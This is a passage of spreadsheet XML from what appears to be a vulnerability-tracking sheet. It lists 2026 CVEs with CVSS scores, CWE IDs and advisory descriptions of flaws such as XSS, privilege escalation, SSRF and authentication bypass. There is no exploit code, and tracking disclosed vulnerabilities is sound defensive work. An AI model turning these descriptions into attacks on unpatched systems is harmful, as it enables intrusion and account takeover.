          <t>CVE-2026-88060</t>
        </is>
      </c>
      <c r="C1497" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1497" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1497" s="5" t="inlineStr"/>
      <c r="F1497" s="5" t="inlineStr"/>
      <c r="G1497" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1497" s="5" t="inlineStr"/>
      <c r="I1497" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1497" s="5" t="inlineStr"/>
      <c r="K1497" s="5" t="inlineStr">
        <is>
          <t>CWE-116, CWE-79</t>
        </is>
      </c>
      <c r="L1497" s="5" t="inlineStr">
        <is>
          <t>Angular is a development platform for building mobile and desktop web applications using TypeScript/JavaScript and other languages. Prior to 20.3.30, 21.2.22, and 22.1.4, Angular server-side rendering (SSR) in @angular/platform-server serializes untrusted input inside template content nested in fallback raw-content elements such as noscript, iframe, noembed, and noframes. The Domino serializer's fallbackRawContentTags traversal stopped at the DocumentFragment used by template.content, so matching closing tags in xmp, style, script, comments, or text nodes were not escaped. Standard interpolation with comments or text nodes is reachable without relaxed schemas; literal xmp or style requires CUSTOM_ELEMENTS_SCHEMA or NO_ERRORS_SCHEMA, while Renderer2 imperative DOM construction is unconditionally affected. When HTML5 RAWTEXT browser parsing encounters the unescaped closing tag, it exits the fallback container and interprets trailing markup as active DOM elements, enabling arbitrary JavaScript execution. This issue is fixed in versions 20.3.30, 21.2.22, and 22.1.4.</t>
        </is>
      </c>
      <c r="M1497" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88060</t>
        </is>
      </c>
    </row>
    <row r="1498">
      <c r="A1498" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1498" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88863</t>
        </is>
      </c>
      <c r="C1498" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1498" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1498" s="5" t="inlineStr"/>
      <c r="F1498" s="5" t="inlineStr"/>
      <c r="G1498" s="5" t="inlineStr"/>
      <c r="H1498" s="5" t="inlineStr"/>
      <c r="I1498" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1498" s="5" t="inlineStr"/>
      <c r="K1498" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L1498" s="5" t="inlineStr">
        <is>
          <t>capgo.app (npm package `capgo`) through version 12.207.1 does not compare the caller's role rank against the requested role in the validateInvite() function of supabase/functions/_backend/private/invite_new_user_to_org.ts. The POST /private/invite_new_user_to_org endpoint only requires the org.update_user_roles permission for org_super_admin invitations, so an authenticated user holding only the org.invite_user permission (e.g., an org_member) can invite an external user as org_admin or org_billing_admin. When the invited account accepts the invitation via POST /private/accept_invitation, ensureOrgMembership creates the role binding using the Supabase service-role key, which bypasses the prevent_role_binding_priority_escalation and check_org_user_privileges database triggers. This allows privilege escalation resulting in full administrative control over the organization's apps, channels, members, and billing. The issue is addressed by pull request #3096, which compares the inviter's rank before permitting elevated invitations.</t>
        </is>
      </c>
      <c r="M1498" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88863</t>
        </is>
      </c>
    </row>
    <row r="1499">
      <c r="A1499" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1499" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88865</t>
        </is>
      </c>
      <c r="C1499" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1499" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1499" s="5" t="inlineStr"/>
      <c r="F1499" s="5" t="inlineStr"/>
      <c r="G1499" s="5" t="inlineStr"/>
      <c r="H1499" s="5" t="inlineStr"/>
      <c r="I1499" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1499" s="5" t="inlineStr"/>
      <c r="K1499" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L1499" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 fails to validate restream ownership in getRestream.json.php, allowing authenticated users with canStream permission to mint tokens for arbitrary restreams. Attackers can exchange the token to retrieve other users' stream keys from getLiveKey.json.php and publish to their YouTube, Twitch, or RTMP destinations.</t>
        </is>
      </c>
      <c r="M1499" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88865</t>
        </is>
      </c>
    </row>
    <row r="1500">
      <c r="A1500" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1500" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88895</t>
        </is>
      </c>
      <c r="C1500" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1500" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1500" s="5" t="inlineStr"/>
      <c r="F1500" s="5" t="inlineStr"/>
      <c r="G1500" s="5" t="inlineStr"/>
      <c r="H1500" s="5" t="inlineStr"/>
      <c r="I1500" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1500" s="5" t="inlineStr"/>
      <c r="K1500" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L1500" s="5" t="inlineStr">
        <is>
          <t>CyberPanel before 3.0.5 fails to enforce two-factor authentication on API endpoints, allowing attackers to bypass TOTP requirements using password-derived tokens. Attackers who obtain an administrator's password can derive API tokens and perform administrative operations or create authenticated sessions without the second factor.</t>
        </is>
      </c>
      <c r="M1500" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88895</t>
        </is>
      </c>
    </row>
    <row r="1501">
      <c r="A1501" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1501" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88937</t>
        </is>
      </c>
      <c r="C1501" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1501" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1501" s="5" t="inlineStr"/>
      <c r="F1501" s="5" t="inlineStr"/>
      <c r="G1501" s="5" t="inlineStr"/>
      <c r="H1501" s="5" t="inlineStr"/>
      <c r="I1501" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1501" s="5" t="inlineStr"/>
      <c r="K1501" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1501" s="5" t="inlineStr">
        <is>
          <t>knowns through 0.33.0 fails to properly validate template destination paths in the code generation template engine, allowing attackers to read and write arbitrary files outside the project root. Attackers can supply malicious templates that traverse directories to overwrite shell profiles, steal credentials, or achieve persistent code execution on victim systems.</t>
        </is>
      </c>
      <c r="M1501" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88937</t>
        </is>
      </c>
    </row>
    <row r="1502">
      <c r="A1502" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1502" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-11813</t>
        </is>
      </c>
      <c r="C1502" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1502" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1502" s="5" t="inlineStr"/>
      <c r="F1502" s="5" t="inlineStr"/>
      <c r="G1502" s="5" t="inlineStr"/>
      <c r="H1502" s="5" t="inlineStr"/>
      <c r="I1502" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1502" s="5" t="inlineStr"/>
      <c r="K1502" s="5" t="inlineStr">
        <is>
          <t>CWE-276</t>
        </is>
      </c>
      <c r="L1502" s="5" t="inlineStr">
        <is>
          <t>A potential improper permissions vulnerability was reported in the Lenovo Filez Client application that could allow a local authenticated user to escalate privileges.</t>
        </is>
      </c>
      <c r="M1502" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-11813</t>
        </is>
      </c>
    </row>
    <row r="1503">
      <c r="A1503" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1503" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12858</t>
        </is>
      </c>
      <c r="C1503" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1503" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1503" s="5" t="inlineStr"/>
      <c r="F1503" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1503" s="5" t="inlineStr"/>
      <c r="H1503" s="5" t="inlineStr"/>
      <c r="I1503" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1503" s="5" t="inlineStr"/>
      <c r="K1503" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L1503" s="5" t="inlineStr">
        <is>
          <t>Improper Privilege Management vulnerability in ESET AV Remover (standalone) allows Privilege Escalation via especially crafted RPC.</t>
        </is>
      </c>
      <c r="M1503" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12858</t>
        </is>
      </c>
    </row>
    <row r="1504">
      <c r="A1504" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1504" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16233</t>
        </is>
      </c>
      <c r="C1504" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1504" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1504" s="5" t="inlineStr"/>
      <c r="F1504" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1504" s="5" t="inlineStr"/>
      <c r="H1504" s="5" t="inlineStr">
        <is>
          <t>ni:labview</t>
        </is>
      </c>
      <c r="I1504" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J1504" s="5" t="inlineStr"/>
      <c r="K1504" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L1504" s="5" t="inlineStr">
        <is>
          <t>There is a memory corruption vulnerability recently
discovered in NI LabVIEW that may result in information disclosure or arbitrary
code execution.  Successful exploitation requires an attacker to get a
user to open a specially crafted VI.  This vulnerability affects NI
LabVIEW 2026 Q3 (26.3.0) and prior versions.</t>
        </is>
      </c>
      <c r="M1504" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16233</t>
        </is>
      </c>
    </row>
    <row r="1505">
      <c r="A1505" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1505" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16234</t>
        </is>
      </c>
      <c r="C1505" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1505" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1505" s="5" t="inlineStr"/>
      <c r="F1505" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1505" s="5" t="inlineStr"/>
      <c r="H1505" s="5" t="inlineStr">
        <is>
          <t>ni:labview</t>
        </is>
      </c>
      <c r="I1505" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J1505" s="5" t="inlineStr"/>
      <c r="K1505" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1505" s="5" t="inlineStr">
        <is>
          <t>There is a memory corruption vulnerability recently
discovered in NI LabVIEW that may result in information disclosure or arbitrary
code execution.  Successful exploitation requires an attacker to get a
user to open a specially crafted VI.  This vulnerability affects NI
LabVIEW 2026 Q3 (26.3.0) and prior versions.</t>
        </is>
      </c>
      <c r="M1505" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16234</t>
        </is>
      </c>
    </row>
    <row r="1506">
      <c r="A1506" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1506" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17107</t>
        </is>
      </c>
      <c r="C1506" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1506" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1506" s="5" t="inlineStr"/>
      <c r="F1506" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1506" s="5" t="inlineStr">
        <is>
          <t>red hat, kubernetes</t>
        </is>
      </c>
      <c r="H1506" s="5" t="inlineStr"/>
      <c r="I1506" s="5" t="inlineStr">
        <is>
          <t>2026-07-24</t>
        </is>
      </c>
      <c r="J1506" s="5" t="inlineStr"/>
      <c r="K1506" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="L1506" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the cluster-proxy service-proxy component used in Red Hat Advanced Cluster Management for Kubernetes (RHACM) and multicluster-engine (MCE). The service-proxy appends impersonation group headers to proxied requests without first removing caller-supplied values, and the spoke ServiceAccount holds unrestricted impersonation permissions. An authenticated hub principal can inject an Impersonate-Group header to escalate to cluster-admin on every managed cluster.</t>
        </is>
      </c>
      <c r="M1506" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17107</t>
        </is>
      </c>
    </row>
    <row r="1507">
      <c r="A1507" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1507" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-23929</t>
        </is>
      </c>
      <c r="C1507" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1507" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1507" s="5" t="inlineStr"/>
      <c r="F1507" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1507" s="5" t="inlineStr"/>
      <c r="H1507" s="5" t="inlineStr">
        <is>
          <t>zabbix:zabbix</t>
        </is>
      </c>
      <c r="I1507" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1507" s="5" t="inlineStr"/>
      <c r="K1507" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="L1507" s="5" t="inlineStr">
        <is>
          <t>Prototype pollution vulnerability in searchParamsToObject() is leading to a persistent XSS in Maps. URL parameter processing was not filtering dangerous properties like __proto__, combined with jQuery's unsafe element creation that traversed the prototype chain.</t>
        </is>
      </c>
      <c r="M1507" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-23929</t>
        </is>
      </c>
    </row>
    <row r="1508">
      <c r="A1508" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1508" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45221</t>
        </is>
      </c>
      <c r="C1508" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1508" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1508" s="5" t="inlineStr"/>
      <c r="F1508" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1508" s="5" t="inlineStr">
        <is>
          <t>windows, openssl</t>
        </is>
      </c>
      <c r="H1508" s="5" t="inlineStr"/>
      <c r="I1508" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1508" s="5" t="inlineStr"/>
      <c r="K1508" s="5" t="inlineStr">
        <is>
          <t>CWE-427</t>
        </is>
      </c>
      <c r="L1508" s="5" t="inlineStr">
        <is>
          <t>Konga before 2.1.0 contains a privilege escalation vulnerability that allows low-privileged local attackers to execute arbitrary code by planting attacker-controlled OpenSSL configuration or library files in a hardcoded filesystem path absent from default installations. On Windows, the missing directory resides in a location writable by any authenticated local user, enabling attackers to create the directory and place malicious files that execute at the privilege level of the user or service account that launches Konga, facilitating privilege escalation.</t>
        </is>
      </c>
      <c r="M1508" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45221</t>
        </is>
      </c>
    </row>
    <row r="1509">
      <c r="A1509" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1509" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45414</t>
        </is>
      </c>
      <c r="C1509" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1509" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1509" s="5" t="inlineStr"/>
      <c r="F1509" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1509" s="5" t="inlineStr"/>
      <c r="H1509" s="5" t="inlineStr"/>
      <c r="I1509" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J1509" s="5" t="inlineStr"/>
      <c r="K1509" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-863</t>
        </is>
      </c>
      <c r="L1509" s="5" t="inlineStr">
        <is>
          <t>Decidim is a participatory democracy framework. Prior to 0.31.5 and in 0.32.0.rc1 before 0.32.0.rc2, JWT-backed API authentication is not bound to the organization selected by the current host, allowing a JWT issued for one tenant to be replayed against another tenant’s API to read participantDetails data and reach the proposal.answer mutation path. This issue is fixed in versions 0.31.5 and 0.32.0.rc2.</t>
        </is>
      </c>
      <c r="M1509" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45414</t>
        </is>
      </c>
    </row>
    <row r="1510">
      <c r="A1510" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1510" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-4644</t>
        </is>
      </c>
      <c r="C1510" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1510" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1510" s="5" t="inlineStr"/>
      <c r="F1510" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1510" s="5" t="inlineStr"/>
      <c r="H1510" s="5" t="inlineStr"/>
      <c r="I1510" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1510" s="5" t="inlineStr"/>
      <c r="K1510" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1510" s="5" t="inlineStr">
        <is>
          <t>A Missing Authorization vulnerability in HTTP Connector in Google Cloud Integration Connectors versions prior to 2025-12-11 on Google Cloud Platform allows an authenticated user to escalate privileges and take over a Google Cloud Project using unauthorized service account attachment.
This vulnerability was patched on 11 December 2025, and no customer action is needed.</t>
        </is>
      </c>
      <c r="M1510" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-4644</t>
        </is>
      </c>
    </row>
    <row r="1511">
      <c r="A1511" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1511" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48113</t>
        </is>
      </c>
      <c r="C1511" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1511" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1511" s="5" t="inlineStr"/>
      <c r="F1511" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1511" s="5" t="inlineStr"/>
      <c r="H1511" s="5" t="inlineStr"/>
      <c r="I1511" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J1511" s="5" t="inlineStr"/>
      <c r="K1511" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1511" s="5" t="inlineStr">
        <is>
          <t>Chisel is a TCP/UDP tunnel, transported over HTTP and secured via SSH. In versions prior to 1.11.5, authenticated clients can bypass --authfile ACL restrictions and tunnel traffic to arbitrary destinations reachable from the server. The ACL is enforced only during the initial handshake against declared remotes, but never on subsequent SSH channels that carry actual traffic. A malicious client can authenticate with a permitted remote, then open channels to any host:port it wants. This issue has been fixed in version 1.11.5.</t>
        </is>
      </c>
      <c r="M1511" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48113</t>
        </is>
      </c>
    </row>
    <row r="1512">
      <c r="A1512" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1512" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54606</t>
        </is>
      </c>
      <c r="C1512" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1512" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1512" s="5" t="inlineStr"/>
      <c r="F1512" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1512" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1512" s="5" t="inlineStr"/>
      <c r="I1512" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J1512" s="5" t="inlineStr"/>
      <c r="K1512" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1512" s="5" t="inlineStr">
        <is>
          <t>SunEditor is a lightweight and powerful WYSIWYG editor in vanilla JavaScript with no dependencies. Prior to 3.1.4, the SunEditor Embed plugin in src/plugins/modal/embed.js parses attacker-controlled raw embed HTML with DOMParser and processes the resulting DOM nodes. When an external script element follows a valid iframe, the plugin recreates a script element from the attacker-controlled src attribute and appends it to the live DOM, causing JavaScript execution in the editor page. If an application stores or reflects SunEditor content without additional backend sanitization, an attacker who can submit embed HTML can trigger stored or reflected cross-site scripting when another user opens, previews, renders, or edits the content, enabling access to page data and account actions as the victim. This issue is fixed in version 3.1.4.</t>
        </is>
      </c>
      <c r="M1512" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54606</t>
        </is>
      </c>
    </row>
    <row r="1513">
      <c r="A1513" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1513" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55108</t>
        </is>
      </c>
      <c r="C1513" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1513" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1513" s="5" t="inlineStr"/>
      <c r="F1513" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1513" s="5" t="inlineStr"/>
      <c r="H1513" s="5" t="inlineStr"/>
      <c r="I1513" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J1513" s="5" t="inlineStr"/>
      <c r="K1513" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-59</t>
        </is>
      </c>
      <c r="L1513" s="5" t="inlineStr">
        <is>
          <t>KubeVela is an open source application delivery platform. Prior to 1.9.14, from 1.10.0-alpha.1 until 1.10.9, and from 1.11.0-alpha.1 until 1.11.0-alpha.4, the Terraform remote configuration loader in pkg/controller/utils/capability.go, GetTerraformConfigurationFromRemote, clones a repository supplied through a core.oam.dev/v1beta1 ComponentDefinition and follows repository-controlled variables.tf or main.tf symlinks. A user with permission to create or update ComponentDefinition objects can point variables.tf to /dev/zero through terraform.path, after which os.Stat and os.ReadFile follow the link and read an unbounded stream before ParseTerraformVariables or HCL parsing can reject the content. The read can exhaust memory, OOM-kill the cluster-wide vela-core controller, cause repeated Pod restarts, and pressure node memory when no effective container limit is configured. This issue is fixed in versions 1.9.14, 1.10.9, and 1.11.0-alpha.4.</t>
        </is>
      </c>
      <c r="M1513" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55108</t>
        </is>
      </c>
    </row>
    <row r="1514">
      <c r="A1514" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1514" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55526</t>
        </is>
      </c>
      <c r="C1514" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1514" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1514" s="5" t="inlineStr"/>
      <c r="F1514" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1514" s="5" t="inlineStr"/>
      <c r="H1514" s="5" t="inlineStr"/>
      <c r="I1514" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J1514" s="5" t="inlineStr"/>
      <c r="K1514" s="5" t="inlineStr">
        <is>
          <t>CWE-350, CWE-918</t>
        </is>
      </c>
      <c r="L1514" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to praisonaiagents 1.6.58, spider_tools._host_is_blocked() does not resolve ordinary hostnames before scrape_page fetches them. A hostname such as 127.0.0.1.nip.io passes validation and resolves to loopback, permitting internal HTTP access. The fix uses socket.getaddrinfo and fails closed on DNS errors. This issue is fixed in version 1.6.58.</t>
        </is>
      </c>
      <c r="M1514" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55526</t>
        </is>
      </c>
    </row>
    <row r="1515">
      <c r="A1515" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1515" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57485</t>
        </is>
      </c>
      <c r="C1515" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1515" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1515" s="5" t="inlineStr"/>
      <c r="F1515" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1515" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1515" s="5" t="inlineStr"/>
      <c r="I1515" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J1515" s="5" t="inlineStr"/>
      <c r="K1515" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-522</t>
        </is>
      </c>
      <c r="L1515" s="5" t="inlineStr">
        <is>
          <t>Stirling-PDF is a locally hosted web application that facilitates various operations on PDF files. Prior to 2.9.0, the /api/v1/pipeline/handleData endpoint in app/core/src/main/java/stirling/software/SPDF/controller/api/pipeline/PipelineProcessor.java injects the STIRLING-PDF-BACKEND-API-USER API key into pipeline subrequests, allowing an authenticated ROLE_USER to retrieve the key through /api/v1/user/get-api-key, impersonate the internal service account, bypass normal rate limits, and access internal endpoints including /api/v1/info/requests/all and /api/v1/info/load/all. This issue is fixed in version 2.9.0.</t>
        </is>
      </c>
      <c r="M1515" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57485</t>
        </is>
      </c>
    </row>
    <row r="1516">
      <c r="A1516" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1516" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58113</t>
        </is>
      </c>
      <c r="C1516" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1516" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1516" s="5" t="inlineStr"/>
      <c r="F1516" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1516" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1516" s="5" t="inlineStr"/>
      <c r="I1516" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1516" s="5" t="inlineStr"/>
      <c r="K1516" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1516" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in Teamcenter V2412 (All versions &lt; V2412.0013), Teamcenter V2506 (All versions &lt; V2506.0010), Teamcenter V2512 (All versions &lt; V2512.2607), Teamcenter V2606 (All versions &lt; V2606.2607). Affected applications do not properly encode user-supplied input reflected into HTML attribute contexts within the authentication redirect flow (/auth/ endpoint).
This could allow an unauthenticated remote attacker to inject arbitrary JavaScript into the browser of an authenticated user who loads a crafted URL, enabling the attacker to perform actions within the victim's Teamcenter session.</t>
        </is>
      </c>
      <c r="M1516" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58113</t>
        </is>
      </c>
    </row>
    <row r="1517">
      <c r="A1517" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1517" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61639</t>
        </is>
      </c>
      <c r="C1517" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1517" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1517" s="5" t="inlineStr"/>
      <c r="F1517" s="5" t="n">
        <v>0.003</v>
      </c>
